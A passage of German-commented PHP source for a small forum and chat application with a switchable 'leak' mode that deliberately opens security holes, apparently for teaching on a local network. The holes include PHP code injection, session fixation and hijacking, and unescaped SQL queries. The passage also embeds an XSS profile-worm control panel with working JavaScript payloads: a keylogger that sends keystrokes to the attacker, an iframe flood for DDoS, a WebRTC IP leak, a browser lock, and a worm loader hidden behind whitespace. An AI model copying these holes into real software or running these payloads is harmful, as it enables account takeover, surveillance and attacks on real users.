"'),
'file' => array('/^(\d+)-(.+)$/e' => '($creolevar = array_merge($creolevar,(($x = $sql["aq"]($conn,"select f.id as upid, '
.'strftime(\"%s\",f.[create]) as uptime, f.status/2%2 as upstatus, f.status%2 as upright, u.username as upuser, '
.'f.name as upname, f.info as upinfo, abs(f.size) as upsize, f.hash as uphash, f.type as uptype from [file] as f '
.'left join [user] as u on u.id = f.user where f.user = $1 and f.name like \'$2\' and f.status is not null",SQLITE_ASSOC))
? reset($x) : array()))) ? "" : ""'),
'hide' => array('/^([^|_\n]*)(\||_)?\s*(.+)$/es' => '\'
Sichheitslücken wurden ";
if(isset($_COOKIE['leak']) and !$_COOKIE['leak'])
setcookie('leak',1,time()-$ctl,$self);
else {
setcookie('leak',0,0,$self);
$out .= "de";
}
$out .= "aktiviert!
";
}
if(isset($_COOKIE['leak']))
$leak = ($_COOKIE['leak']) ? $leak : false;
if($leak === 1 or $leak and (preg_match('/^(127(\.\d+){3}|localhost|::1)$/i',$_SERVER['REMOTE_ADDR'])
or isset($_SERVER['SERVER_ADDR']) and $_SERVER['SERVER_ADDR'] == $_SERVER['REMOTE_ADDR'])) { // PHP-Code-Injection aktivieren
$leak = 1;
$creole = array_merge(array(str_replace(array(89,'$'),array('\d',''),key(array_slice($creole,0,1))) => current(array_slice($creole,0,1))),array_slice($creole,1));
$info[0] = ", [[^Creole]]-Formatierung";
}
elseif($leak)
$info[1] = "//PHP-[[::W/)Code_injection|+]] wurde aus Sicherheitsgründen im [[::w/)Quelltext]] deaktiviert. Und sollte nur im abgeschotteten [[::w/Local_Area_Network|Lokalen Netzwerk]] aktiviert und getestet werden!//\n";
}
if($leak) {
if(isset($_COOKIE['to']) and preg_match('!^https?://\S+!',$_COOKIE['to'],$var))
$attack['_jsleak_'] = "'$var[0]'";
$info[2] = "**Alle Daten werden in Klartext gespeichert und können durch ??ak?? ausgelesen werden!**\n";
$info[7] = " (//Nur im [[^Leak^Sicherheitslücken ein/aus Schalten^|Sicherheitsmodus]]//)";
if(!preg_match('!^[\'"]?https?://!',$attack['_jsleak_']))
$info[5] = "Aus Sicherheitsgründen sind die ??ak?? mit relativen bzw. lokalen [[::w/)Pfad(name]]en entwickelt worden, so dass die Daten das ??if?? nie wirklich verlassen. //(Mit dem Nachteil, dass viele [[::w/Sicherheitssoftware|Security-Systeme]] die ??ak?? als ungefährlich einstufen.)//";
}
else
$sql[0] = preg_replace('/CREATE TABLE\s*\[(worm|xss)\][^;]+;/s','',$sql[0]);
# "Externen" Angriffs-Code (JavaScript) zurückgeben
$attack['_worm_'] = "";
if($leak and preg_match('/^(worm(line|test|y?)|(bnps))(?:\.(js|txt))?$/i',$request,$var)) { // Tiny-Profil-Wurm
$code = false;
$val = strtolower($var[1]);
if(substr($val,0,4) == 'worm') {
if($var[2] == 'test' and isset($worm))
$code = $worm;
elseif($var[2] == 'line')
$code = $attack['_worm_'];
elseif($var[2] == 'y')
$code = "Wormy was here!".((isset($query) and $query != '' and preg_match('!^https?://!',$query))
? "\n" : '')."";
elseif($var[2] == '')
$code = "";
}
elseif($val == 'bnps') // Angriffs-Presets für den Control-Center
$code = strtr(<< 1) {
top.location.reload();
'Reloaded'
}",
"!Remove Bot", // Selbst Zerstörung (Profil bleibt erhalten)
"X([M[6],'profil=' + Y(X([M[6]]).match(/[<](textarea).*?>([^\\0]*?)\s+(&(amp;)?lt;|<)script\s(id|title)=[^\\0]+?<\/\\1>/)[2])]);
'Removed'",
"!Sleep Bot", // Bot deaktivieren
"if(J > 1) {
W = -1;
'Sleeping...'
}",
"Chat: Decrypt-Text", // Verschlüsselte Chat-Nachricht entschlüsseln (Nur beim Sender/Empfänger möglich)
"top.CryptoJS.AES.decrypt('##var##'.replace(/^\w+\//,''),top.window.name.replace(/^key:[\w,]+,(?=\w+$)/,'')).toString(top.CryptoJS.enc.Utf8);",
"Chat: Get Keys", // Secret, Public und Script-Keys anzeigen
"a = top.F, b = top.window.name.replace(/^key:/,'').split(',');
(a ? 'n=' + a[2] + '%0ag=' + a[1] + '%0ap=' + a[0] + '%0a' : '') + 'a=' + b[0] + '%0aA=' + b[1] + '%0aK=' + b[2] + '%0a'",
"Debug-Infos", // Alle Bot-Variabeln zurückgeben
"M.join('%0a') + '%0a***%0a' + O.join('%0a') + '%0a***%0a' + [J,S,W].join('%0a')",
"DDoS-Attack,$attack[_xlink_]", // Eine Webseite unter Dauerbeschuss setzen
"a = ['##var##','DDoS-Attack','name','DoS','id','DoS','style','display:none'],
b = top.document.createElement('iframe');
for(c=2;c
');
'Open Fire'",
"DDoS-STOP", // Waffenruhe
"if((a = top.document.getElementById('DoS')))
a.parentNode.removeChild(a);
'Peace'",
"Fenster-Titel,Hello World!", // Fenster-Titel ändern
"top.document.getElementsByClassName('title')[0].innerHTML = '##var##'",
"Hacked-Info,Y0u h4v3 b33n H4ck3d!", // Nachricht an den User schicken
"while(confirm('##var##'));
'Confirm'",
"Home-Profil,/Profil", // Das Benutzer-Profil aufrufen
"if(J > 1)
top.location.href = M[5] + '##var##'",
"Keylogger (Bugy)", // Alle Tasten loggen und alle 10 Sekunden zum Hacker schicken
"var a,K = '';
top.document.onkeypress = function(e) {
a = window.event ? event : e;
K += String.fromCharCode(a.keyCode ? a.keyCode : a.charCode);
};
window.setInterval(function() {
if(K != '')
X([M[7],'chat=call:0,' + Y(K)]);
K = '';
},10000);
'Keys logging'",
"Lock Browser,##pass##", // Browserfenster mit Kennwort sichern
"a = top.document.createElement('div');
a.setAttribute('style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);');
top.document.body.appendChild(a);
b = 1;
while(prompt('Enter Password!') != '##var##')
b++;
a.parentNode.removeChild(a);
b + ' try(s)'",
"Place Kitten,$attack[_clink_]", // Alle Standart-Grafiken durch Katzenbilder ersetzen
"for(d=0;dX
';
top.document.body.appendChild(a);
'Poping up'",
"Rick Rolling,640 480 $attack[_ylink_]",// Musikvideo abspielen
"a = top.document.createElement('div');
b = ['style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);',
'ondblclick','this.parentNode.removeChild(this);','id','ricknroll'];
for(c=0;c';
top.document.body.appendChild(a);
'Rick\'n\'Roll'",
"Rick Killing", // Musikvideo entfernen
"if((a = top.document.getElementById('ricknroll'))) {
a.parentNode.removeChild(a);
'Rick killed'
}",
"WebRTC-IPs,2000", // Lokale/Externe IP-Adresse des Bots ausgeben
"a = top.document.createElement('iframe');
a.setAttribute('id','iframe');
a.setAttribute('style','display:none');
a.setAttribute('sandbox','allow-same-origin');
top.document.body.appendChild(a);
function Q(a) {
if((a = /(\d{1,3}(\.\d{1,3}){3}|[a-f\d]{1,4}(:[a-f\d]{1,4}){7})/.exec(a)[1]) && c.indexOf(a) < 0)
c += ',%20' + a;
}
try {
b = !!window.webkitRTCPeerConnection,
c = '',
e = {iceServers: [{urls: 'stun:stun.services.mozilla.com'}]};
if(!(a = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)) {
d = iframe.contentWindow;
a = d.RTCPeerConnection || d.mozRTCPeerConnection || d.webkitRTCPeerConnection;
b = !!d.webkitRTCPeerConnection;
}
d = {optional: [{RtpDataChannels: true}]};
b = new a(e,d);
b.onicecandidate = function(a) {
if(a.candidate)
Q(a.candidate.candidate);
};
b.createDataChannel('');
b.createOffer(function(a) {
b.setLocalDescription(a, function(){}, function(){});
}, function(){});
} catch(e){};
setTimeout(function() {
try {
a = b.localDescription.sdp.split('%0a');
a.forEach(function(b) {
if(b.indexOf('a=candidate:') === 0)
Q(b);
});
} catch(e){};
if(c != '') {
X([M[7],'chat=call:0,' + c.substr(4)]);
(a = top.document.getElementById('iframe')).parentNode.removeChild(a);
}
},##var##);0",
"Worm-Loader [Install]", // XSS-BotWurm außerhalbs des Profils laden
"a = '';
for(b=0;b<80;b++)
a += '%09';
if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2] + unescape(a) + '']);
b[2];
}",
"Worm-Loader [Remove]", // XSS-BotWurm Loader deinstallieren
"if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2]]);
b[2];
}",
"Worm-Loader [Cookie]", // XSS-BotWurm-Loader im Cookie verstecken
"document.cookie='username=' + encodeURI(unescape('%22> ($a = explode(' ',$attack['_wordlist_'])) ? $a[rand(0,count($a)-1)] : ''));
if(!$code)
$code = 'Malware not found ;-)';
$code = (isset($var[4]) and $var[4] == "txt" or !isset($var[4]) and preg_match('/[A-Z]/',substr($var[0],0,1))) ? array('plain',trim($code))
: array('javascript',((substr($val,0,4) == 'worm') ? "// Malware mit installieren!\ndocument.write(\""
.strtr(preg_replace($js,'',$code),array('\\' => '\\\\', '"' => '\\"')).'");' : strtr(preg_replace($js,'',$code),array('\\' => '\\\\'))));
header("Content-Type: text/$code[0]; charset=8859-1");
die($code[1]);
}
# Alle Cookie dauerhaft speichern (1 Jahr)
if($request == 'Cookie') {
$a = 0;
$val = time() + ((isset($_GET['time']) and preg_match('/\d+/',$_GET['time'],$val)) ? $val[0] : $ctl);
foreach($_COOKIE as $key => $var)
if(!preg_match('/^('.preg_quote(session_name()).')$/',$key)) {
$a++;
setcookie($key,$var,$val,$self);
}
if($a)
$out = "
Cookies werden bis zum ".date('d.m.Y H:i:s',$val)." gespeichert!
";
}
# PHP-Version auf min 4.3 und max 7.0 prüfen
if(preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1] < 4 or $var[1] == 4 and $var[2] < 3 or $var[1] >= 7)) {
$out .= "
PHP von 4.3 bis 5.6 wird vorausgesetzt!
Empfohlen wird PHP 5.3 mit SQLite2 Addon!
";
$request = 'Impressum';
$sql = false;
}
# SQLite vorbereiten, testen und bei Fehler neue Datenbank anlegen
elseif($sql) {
foreach(preg_split('/\s+/',$sql[1]) as $val)
if(!isset($sql[$key = strtolower(preg_replace('/[^A-Z]+/','',$val))]))
$sql[$key] = 'sqlite_'.strtolower($val);
if(!function_exists($sql['o']) or !defined('SQLITE_BOTH')) {
$sql = false;
if(defined('SQLITE3_BOTH')) {
$var = "Das SQLite3-Addon";
if($val = glob(preg_replace('/(?=\.\w+$)/','*3',basename(__FILE__))) and count($val)) {
header("Location: ".preg_replace('/\/[^\/]*?$/','',$self)."/$val[0]");
header('HTTP/1.0 303 See Other');
$sql = 0;
}
}
else
$var = "Die PHP-Erweiterung SQLite";
$out = "
";
$sql = false;
}
else {
# Variablen mit Datenbank setzen
if(!$mid and $path and preg_match('!/?(Blog|Profil)/([\w.-]+)$!i',$path,$var)) {
$mid = $sql['sq']($conn,"select id from [user] where username like '$var[2]'");
if($request == 'Blog')
$getopt[] = "id=$mid";
}
if(!$lone = $sql['sq']($conn,"select count(*) from [user]")) {
$info[3] = "**Der [[^Anmelden|erste Benutzer]] des Forums bekommt automatisch Admin-Rechte!**\r\n";
$user = true;
if(!$request and !$query or $request == 'Mitglieder')
$request = 'Anmelden';
}
elseif($lone > 1)
$lone = false;
$getopt = (isset($getopt)) ? implode("&",$getopt) : ''; // Suchoptionen als url festlegen
# Sitemap ausgeben
if($craw and $request == 'sitemap.xml' and $array = $sql['aq']($conn,"
select name, -- CMS
strftime('%Y-%m-%d',change) as date
from [cms]
where status/8%2 = 1 and status/2%4 = 0 and content like '%\n%'
union
select 'Profil/'||username as name, -- User-Profil
strftime('%Y-%m-%d',change) as date
from [user]
where status is not null and profil is not null
union
select 'Blog/'||u.username||'?q='||f.id as name, -- User-Blog
strftime('%Y-%m-%d',f.change) as date
from [forum] as f
left join [user] as u on u.id = f.userid
where f.userid = f.mailid and f.status%2 = 0 and u.status is not null
order by date desc",SQLITE_ASSOC)) {
foreach($array as $key => $var)
$array[$key] = "$Self/$var[name]$var[date]";
header('Content-Type: text/xml');
die("\n"
."\n".implode("\n",$array)."\n");
}
# Mit Ajax Daten für ein Benutzer zurückgeben
if(isset($_GET['salt']) and preg_match('/[@\w.-]+/',$_GET['salt'],$var)) // Salt
die((preg_match('/^([\w.-]+),salt:(\w+)-hash:\w+$/',$sql['sq']($conn,"select username||','||password from [user] where username like '$var[0]' or mail like '$var[0]'"),$val)) ? "$val[1]:$val[2]" : false);
elseif(isset($_GET['ask']) and preg_match('/([@\w.-]+)(?::([\w@.-]+))?/',$_GET['ask'],$var)) // ask
die((preg_match('/^(\d+)-(?:(.+?):)?/',$sql['sq']($conn,"select passhelp from [user] where username like '$var[1]'".(($leak) ? "" : " and mail like '".((isset($var[2])) ? $var[2] : '')."'")),$val)) ? (($val[1]) ? "$val[1]-{$pass[$val[1]]}" : "$val[1]-$val[2]") : false);
# Alternativer Hash-Login
if(count($_POST) == 0 and (isset($_GET['id']) and preg_match('/^(\d+)\.(\w+)$/',$_GET['id'],$var)
or isset($_SERVER['HTTP_REFERER']) and preg_match('/id=(\d+)\.(\w+)/',$_SERVER['HTTP_REFERER'],$var))
and $row = $sql['sq']($conn,"select username||':'||password from [user] where status is not null and id=$var[1]") and $hash[0]($row) == $var[2]) {
$status = 1;
$uid = $var[1];
$row = $var[0];
}
# Feeds ausgeben
if($request == 'Atom' and ($inet or !$inet and $uid)) {
if($id and $uid and $row)
$uid = $id;
$array = $sql['aq']($conn,"
select f.id as id,
f.id as name,
f.[create] as 'create',
f.[create] as change,
path,
ifnull(title,'Ohne Titel') as title,
mailid,
message,
ifnull(f.status%2,'-1') as right,
ifnull(u.username,'Unbekannt') as author,
ifnull(m.username,'Unbekannt') as tomail
from [forum] as f
left join user as u on u.id = f.userid
left join user as m on m.id = f.mailid
where f.status is not null and ".(($mid) ? "f.mailid = f.userid and f.userid = $mid".(($uid) ? "" : " and f.status%2 = 0")
: (($uid) ? "(f.mailid is null or f.mailid = $id or f.mailid is not null and f.userid = $id)"
.((isset($_GET['latest']) and $var = $sql['sq']($conn,"select change from [user] where id=$id"))
? " and (f.[create] > datetime('$var') or f.mailid = $id and f.status/2%2 = 0)" : "")
: "f.mailid is null and f.status%2 = 0")."
union all
select id,
name,
[create] as 'create',
change,
null as path,
ifnull(description,'Ohne Titel') as title,
null as mailid,
content as message,
ifnull(status/2%4,'-1') as right,
(select username from user where status/2%2 order by id limit 1) as author,
'Unbekannt' as tomail
from [cms]
where status/8%2 = 1 and status/2%4 < ".(($uid) ? 3 : 1))."
order by 4 desc
limit ".max(min(((isset($_GET['max']) and preg_match('/\d+/',$_GET['max'],$var)) ? $var[0] : $paging[1]),$paging[2]),$paging[0]),SQLITE_ASSOC);
foreach($array as $key => $var) {
$creolevar = array_merge($creolevar,array('type' => 'feed', 'id' => $var['id'], 'name' => $var['name'], 'title' => $var['title'], 'from' => $var['author'], 'right' => $var['right'], 'create' => strtotime($var['create']), 'change' => strtotime($var['change'])));
$array[$key] = "".strtr($var['title'],$html)."
" : '')
.preg_replace(array_keys($creole),str_replace($self,$Self,array_values($creole)),strtr(preg_replace('/::f\/[\w()!,.-]+/',"\$0&id=$row",$var['message']),array_slice($html,1)))."]]>$var[id].".strtotime($var['create'])."".date("Y-m-d\TH:i:s",strtotime($var['change'])).preg_replace('/([+-][\d]{2})([\d]{2})/','$1:$2',date("O",strtotime($var['change'])))."".strtr($var['author'],$html)."$Self/Profil/".strtr($var['author'],$html)."".(($var['mailid'] and $var['author'] != $var['tomail']) ? "
".strtr($var['tomail'],$html)."$Self/Profil/".strtr($var['tomail'],$html)."" : "")."\n\n";
}
$cleanup = array_merge($creoleph['toutf'],array('/[\x00-\x1f]+/' => ''));
header('content-type: text/xml; charset=UTF-8');
die("
$title".preg_replace('/^.+?([^<]+).*$/s','$1',reset($array))."PHP/".phpversion()."$logo\n".preg_replace(array_keys($cleanup),array_values($cleanup),implode('',$array))."\n");
}
# Session starten
if($leak and isset($_GET[session_name()]))
session_id($_GET[session_name()]);
@session_start();
if(isset($_SESSION['uid']) and $_SESSION['uid']) {
$uid = $_SESSION['uid'];
$status = $sql['sq']($conn,"select status from [user] where id=$uid");
}
else
$_SESSION['src'] = (!isset($_COOKIE['login']) and isset($_SESSION['src'])) ? $_SESSION['src'] + 1 : 0;
# Sessiondaten manipolieren
if($leak and $request == 'set' and preg_match(substr($dpsk,0,-2).'=([\w\s:-]*)$/',urldecode($query),$var))
if($var[2])
$_SESSION[$var[1]] = $var[2];
else
unset($_SESSION[$var[1]]);
# Cookie-Login
if(isset($_COOKIE['login']) and preg_match('/^(\d+)\.(\w+)$/',$_COOKIE['login'],$var) and $val = $sql['aq']($conn,"
select username||':'||password as hash,status,change from [user] where status is not null and id = $var[1]") and $hash[0]($val[0]['hash']) == $var[2]) {
$row = array('set' => "status=(status/2%8*2+1),", 'where' => "(status%2 = 0 or datetime(change,'+$eos minutes') < datetime('now','localtime')) and ");
$uid = $var[1];
if(!isset($_SESSION['uid'])) {
$_SESSION['uid'] = $uid;
$_SESSION['lua'] = $val[0]['change'];
setcookie('login',"$uid.".$hash[0]($val[0]['hash']),time()+$ctl,$self);
}
$status = floor($val[0]['status']/2)*2+1;
}
# uid in der Datenbank und angemeldet? - Sonst automatisch abmelden
if($uid and isset($_SESSION['uid'])) {
if($sql['sq']($conn,"
select id
from [user]
where id=$uid".(($leak) ? "" /* Session-Klau ermöglichen */ : "
and useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'")."
and status%2=1") == $uid) {
$sql['e']($conn,"
update [user] set change=datetime('now','localtime'),
requests=requests+1
where id=$uid and status=(status/2%8*2+1)");
$un = $sql['sq']($conn,"select username from [user] where id = $uid");
}
else {
$sql['e']($conn,"
update [user] set status=(status/2%8*2)
where id=$uid");
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
setcookie(session_name(),'',time()-$ctl,'/');
$status = 0;
$uid = false;
}
}
# Loginbestätigung für Atom-Feeds & Cookie-Login
if($rw and $uid and $row)
$sql['e']($conn,"
update [user] set ".((is_array($row) and isset($row['set'])) ? $row['set'] : '')."
logins=logins+1,
requests=requests+1,
change=datetime('now','localtime'),
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'
where ".((is_array($row) and isset($row['where'])) ? $row['where'] : '')."status is not null and id=$uid");
# Datei-Download
if($request == 'file'
and ( preg_match('/^(\d+)(?:-([\w!,.-]+))?/',$query,$var)
or ($var[1] = $mid) and $var[2] = $query))
if($file = $sql['aq']($conn,"
select c.id as id,
a.name as name,
ifnull(ifnull(a.type,b.type),'application/octet-stream') as type,
ifnull(a.size,b.size) as size,
ifnull(a.data,b.data) as data,
strftime('%s',ifnull(a.[create],b.[create])) as time
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
left join [file] as c on a.id = c.id".(($status/2%2) ? "" : " and (c.status%2 = 1 or c.status%2 = 0 and '$uid' != '')")."
where ".((!@$var[2]) ? (($status/2%2) ? "" : "a.user = ".(int)$uid." and ")."a.id = ".(int)$var[1]
: "a.user = ".@(int)$var[1]." and a.name like '".@$sql['es']($var[2])."'")."
order by a.id desc, a.name
limit 1",SQLITE_ASSOC))
if($file[0]['id']) {
if($cache) {
$time = $file[0]['time'];
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
if(($val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset($val["If-None-Match"]) and isset($val["If-Modified-Since"])
and $val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and $_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
header("Content-Type: ".$file[0]['type']);
header("Content-Length: ".abs($file[0]['size']));
header('Content-Disposition: filename="'.$file[0]['name'].'"');
die((($var = base64_decode($file[0]['data']) and $file[0]['size'] > 0) ? $var : $gz['inflate']($var)));
}
else {
header('HTTP/1.0 401 Unauthorized');
die("
Datei benötigt Benutzeranmeldung!
");
}
else {
header('HTTP/1.0 404 File Not Found');
die("
Datei nicht gefunden!
");
}
# Forum bei Externen-Adressen ohne Ameldung deaktivieren
if(!$inet and !$uid and !$local)
$request = 'Impressum';
# Statischen/Dynamischen Content bereitstellen/ausgeben
if($content = (isset($content[$request])) ? $content = $content[$request] : (($request and !isset($_REQUEST['nocms']) or !count($_GET) and !count($_POST)) ? $sql['aq']($conn,"
select ifnull(r.content,ifnull(c.content,'')) as '.content',
strftime('%s',ifnull(r.change,c.change)) as change,
strftime('%s',ifnull(r.[create],c.[create])) as 'create',
ifnull(r.id,c.id) as id,
ifnull(r.name,c.name) as name,
ifnull(r.description,c.description) as title,
ifnull(ifnull(r.status,c.status)/2%4,'-1') as right,
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as r on r.name like c.content
where c.name like '".preg_replace('/^(Abmelden)$/','',$request)."' and c.status/2%4 <= ".($status/2%2 + $status%2*2),SQLITE_ASSOC) : false)) {
if(is_array($content) and $var = reset($content)) {
header('Last-Modified: '.date('r',$var['change']));
$head['cms'] = "";
if($var['right'] == 2 or $status/2%2)
$uedit = "CMS?id=$var[id]";
$creolevar = array_merge($creolevar,$var);
$content = $var['.content'];
}
if(preg_match('!^(https?://|/|\.|#|::(?=l\/))[^<\s\'>]+$!',$content,$var)) { // Linkweiterleitung
if($var[1] == '::')
$content = strtr($content,array('::l' => $self, '::L' => $Self));
header("Location: $content");
die("$content
");
}
if($content)
$out .= "
";
$request .= " ";
}
# Datenbank beschreibbar
if($rw) {
# Pre-Chatline: Abmelden wenn Interaktionslose Zeit abgelaufen & Aufräumen
$sql['e']($conn,"
update [user] set status = (status/2%8*2), -- Autologoff
chat = null
where status = (status/2%8*2+1)
and datetime(change,'+$eos minutes') < datetime('now','localtime')
and status is not null;
update user set [chat] = null -- Aufraeumen
where id = ( select a.id
from [user] as a
left join [user] as b on a.chat = b.id".(($leak) ? "" : " and b.status > 0")." -- Chatpartner noch Online (Moeglicher Fehler: > 0)
where a.status is not null and a.chat > 0 and b.chat is null -- Chatter nicht gesperrt und noch Online (Moeglicher Fehler: > 0)
limit 1); -- und Chatpartner nicht im Chat
delete from [chat]
where chat = (select a.chat -- chatkanal
from [chat] as a
left join [user] as b on a.chat = b.chat -- Teilnehmer des Chatkanals
or a.chat <= 0 and a.user = b.id and status%2 = 1 -- Teilnehmer ist online
or abs(a.chat) = b.id and a.chat != b.id and (b.chat is null and status%2 = 1 or b.chat = b.id)
where b.id is null -- Keins der Bedingungen trifft zu!
group by a.chat
limit 1)");
# Chatline
if($request == 'Chat' and !$lone and $uid and $status%2) {
$wait = false;
foreach($array = array( // Browser-Cache komplett abschalten
'Cache-Control' => 'no-cache, no-store, must-revalidate',
'Pragma' => 'no-cache',
'Expires' => '0') as $key => $var) {
header("$key: $var");
$head[] = "";
}
if(isset($_REQUEST['chat']) and preg_match('/^(auth|call|edit|news|quit|send|sign|user|html)(?::(.*))?$/',$_REQUEST['chat'],$chat)) {
#html
if($chat[1] == 'html') { // Chatline ohne JavaScript
$wait = (isset($_REQUEST['wait']) and preg_match('/^\d{1,3}$/',$_REQUEST['wait'],$var) and $var[0] >= 30) ? $var[0] : 30;
if($status/8%2) // Verschlüsselung abschalten
$sql['e']($conn,"update user set status = status%8 where id = $uid");
if(isset($_REQUEST['edit']) and preg_match('/^[01]$/',$_REQUEST['edit'],$var) and $var[0] != $status/4%2) // edit
$chat = array(0,'edit',$var[0]);
elseif(isset($_REQUEST['call']) and isset($_REQUEST['user']) and isset($_REQUEST['line'])
and preg_match('/^\d+,.*$/',"$_REQUEST[user],$_REQUEST[line]",$var)) // call
$chat = array(0,'call',$var[0]);
elseif(isset($_REQUEST['quit'])) // quit
$chat[1] = 'quit';
elseif((isset($_REQUEST['send']) or isset($_REQUEST['doit'])) and isset($_REQUEST['line']) and $_REQUEST['line'] != '') // send
$chat = array(0,'send',$_REQUEST['line']);
elseif($var = $sql['aq']($conn,"select user,text from [chat] where chat = -$uid limit 1")) // auth
$chat = array(0,'auth',(($status/4%2 and !preg_match('/^key:\w+:/',$var[0]['text'])) ? '' : '-').$var[0]['user']);
}
else
$out = 0;
#user
if($chat[1] == 'user') // Userstatus übermitteln
$out = implode(",",$sql['sq']($conn, /* id:status,chat,users; ... */ "
select u.id||','||ifnull(c.status,u.status)
from [user] as u
left join [user] as c on u.chat = c.chat
where u.status is not null
group by u.id"));
#edit
elseif($chat[1] == 'edit' and @preg_match('/^[013457]$/',$chat[2]) and $sql['e']($conn, /* Eigenen Chatstatus bearbeiten */"
update [user] set
status = status%4+(($chat[2]%2 + $chat[2]/4%2*2)*4)
where id = $uid"))
$out = $sql['c']($conn);
#auth
elseif($chat[1] == 'auth' and preg_match('/^(-?\d+)(?:,(\w+),([=\w\/+]+))?$/',$chat[2],$var) and $sql['e']($conn, /* Chat Erlauben */"
update [user] set
chat = ".(($var[1] < 0) ? 'null' : 'chat*-1')."
where abs(chat) = $uid and id = abs($var[1]);".(($var[1] < 0) ? "
delete from [chat]
where chat = -$uid and user = abs($var[1])" : "
update [user] set
chat = id
where chat is null and id = $uid;
update [chat] set
chat = abs(chat)
where chat = -$uid and user = abs($var[1])".((count($var) > 3) ? ";
insert into [chat] (chat,user,time,text) values ($uid,$var[1],datetime('now','localtime'),'key:$var[2]/$var[3]:')" : ""))))
$out = $sql['c']($conn);
#send/sign
elseif(($chat[1] == 'send' or $chat[1] == 'sign' and $status/2%2) and @preg_match('/^.+$/',$chat[2]) and $sql['e']($conn, /* Nachricht Senden */ "
insert into [chat] (chat,user,time,text) values (".(($chat[1] == 'send') ? $sql['sq']($conn,"select chat from [user] where id = $uid") : 0).",$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',((preg_match('!^[\w+/]+=*$!',$chat[2]) or !$leak) ? strtr($chat[2],$html) : @preg_replace(array_keys($creole),array_values($creole),strtr($chat[2],$html)))))."')"))
$out = $sql['c']($conn);
#call
elseif($chat[1] == 'call' and preg_match('/^(\d+),?(.*)$/',$chat[2],$val) and ($var = $sql['sq']($conn,/* Chat beginnen */"
select ifnull(b.chat,a.id)
from user as a
left join [user] as b on b.chat = a.chat
left join ( select d.id,
count(d.chat) as chats
from user as d
left join user as e on d.chat = e.chat
group by d.id) as c on c.id = a.id
where (b.status%2 and b.status/4%2
or b.id is null and a.status%2 and a.status/4%2
or a.id = b.id and c.chats = 1) and a.id = $val[1]
limit 1")) !== false) // Botnet Workaround für Antworten
$out = $sql['e']($conn,"
update [user] set
chat = '-".intval($var)."'
where chat is null and id = $uid;
insert into [chat] (chat,user,time,text) values ('-".intval($var)."',$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',$val[2]))."');");
#quit
elseif($chat[1] == 'quit' and $val = reset(($sql['aq']($conn, /* Chat beenden */ "
select a.chat as chat,count(b.id) as users
from [user] as a
left join [user] as b on a.chat = b.chat
where a.id = $uid
group by a.id")))) {
$sql['e']($conn, /* Offene Chatanfragen löschen */ "
delete from [chat]
where user = $uid and chat < 0");
if(($val['chat'] and $val['chat'] != $uid or $val['users'] and $val['users'] < 3)) // Nur den Client oder beide beim Privaten Chat
$sql['e']($conn,"
update [user] set
chat = null
where chat = $val[chat]".(($val['users'] < 3) ? "" : " and id = $uid"));
elseif($val['chat'] == $uid and $var = $sql['sq']($conn,"select id from [user] where chat = $val[chat] and id != $uid limit 1")) // Master ersetzen
$sql['e']($conn,"
update [user] set
chat = null
where id = $uid;
update [user]
set chat = $var
where chat = $val[chat];
update [chat] set
chat = $var
where chat = $uid");
$out = 1;
}
#news
elseif($chat[1] == 'news' and @preg_match('/\d*/',$chat[2])) { // Aktuelle Chat-Neuigkeiten abfragen
$var = $sql['aq']($conn,"
select count(a.id), -- 0 Anzahl User
count(nullif(a.status%2,0)), -- 1 Anzahl der Logins
count(nullif(a.status/4%2,0)), -- 2 Anzahl der Chatter
count(nullif(a.status/8%2,0)), -- 3 Anzahl der Chatter
count(a.chat), -- 4 Anzahl der Chats
ifnull(sum(a.chat),0), -- 5 Hash der Chats
count(b.id), -- 6 Anzahl der Masters
ifnull((select chat from [user] where id = $uid),'-'), -- 7 Eigene Chat-ID
ifnull((select id from user where chat != $uid and abs(chat)=$uid limit 1),'-') -- 8 Erste ID von Chatanfrage(n)
from [user] as a
left join [user] as b on a.id = b.id and b.id = b.chat
where a.status is not null",SQLITE_NUM);
if($val = intval($var[0][8])) ## 9 Erster Text von Chatanfrage(n)
$var[0][] = preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$sql['sq']($conn,"select text from chat where user = $val and chat = -$uid limit 1"));
$val = (isset($chat[2])) ? intval($chat[2]) : 0;
$wrt = intval($var[0][7]); // Chat-ID
$out = implode(',',$var[0]).";";
$var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = $wrt or chat = '0'"); // 1 Max Chat-Messages
$out .= "$var;";
if(isset($chat[2]) and $var > $val and $array = $sql['aq']($conn, /* 2 Anzahl der Messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where (".(($wrt) ? "chat = $wrt or " : "")."chat = '0') and id > $val" /* Keine Chatanfragen anzeigen (Hack ermöglichen) */."
order by id") and count($array)) {
$out .= count($array);
foreach($array as $var)
